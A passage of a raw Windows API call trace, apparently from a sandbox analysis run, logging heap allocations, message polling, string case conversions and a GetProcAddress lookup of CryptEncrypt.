lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0106.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0106.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0106.822] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.822] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748b0 [0106.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0106.822] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0106.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0106.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.823] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748b0 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0106.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0106.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0106.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0106.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0106.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0106.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.824] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0106.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.824] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0106.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74478 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a809e0 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74160 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0106.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0106.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0106.828] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0106.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 